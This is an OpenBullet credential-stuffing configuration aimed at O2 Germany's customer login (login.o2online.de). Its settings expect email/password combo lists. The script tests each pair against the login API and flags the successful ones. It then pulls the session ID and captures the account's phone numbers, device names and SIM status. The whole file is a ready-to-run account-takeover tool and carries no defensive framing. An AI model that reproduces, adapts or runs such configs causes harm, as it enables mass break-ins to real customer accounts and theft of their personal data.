[SETTINGS]
{
  "CreatorLK": "OB-ea0de401f6483bd78a57d3072bfb1a23-LoliKEY",
  "Name": "MeinO2",
  "SuggestedBots": 1,
  "LastModified": "2019-04-18T18:08:45.2540687+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Acemy#7578",
  "Version": "1.2.2.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://login.o2online.de/applogin/login" 
  CONTENT "{}" 
  CONTENTTYPE "application/json" 
  HEADER "X-OpenAM-Password: <PASS>" 
  HEADER "X-OpenAM-Username: <USER>" 
  HEADER "User-Agent: Mozilla%2F5.0%20%28iPhone%3B%20CPU%20iPhone%20OS%2012_0_1%20like%20Mac%20OS%20X%29%20AppleWebKit%2F605.1.15%20%28KHTML%2C%20like%20Gecko%29%20Mobile%2F16A404" 
  HEADER "Accept-API-Version: resource=2.0, protocol=1.0" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Authentication Failed" 
  KEYCHAIN Success OR 
    KEY "successUrl" 

REQUEST GET "https://www.o2online.de/jsp/checkCookie.jsp" 
  
  HEADER "Host: www.o2online.de" 
  HEADER "Referer: https://www.o2online.de/ecareng/" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "var o2sid = '" "'" -> VAR "ID" 

REQUEST GET "https://www.o2online.de/vt-usage-data/api/devices" 
  
  HEADER "Host: www.o2online.de" 
  HEADER "Referer: https://www.o2online.de/ecareng/uebersicht?subscriptionId=1084720741" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" 
  HEADER "Ecareng-Selected-Subscription: <ID>" 

PARSE "<SOURCE>" LR "msisdn\":\"" "\"," Recursive=TRUE -> CAP "Telephone Number" 

PARSE "<SOURCE>" LR "label\":\"" "\"," Recursive=TRUE -> CAP "Device" 

PARSE "<SOURCE>" LR "status\":\"" "\"," -> CAP "SIM STATUS" 

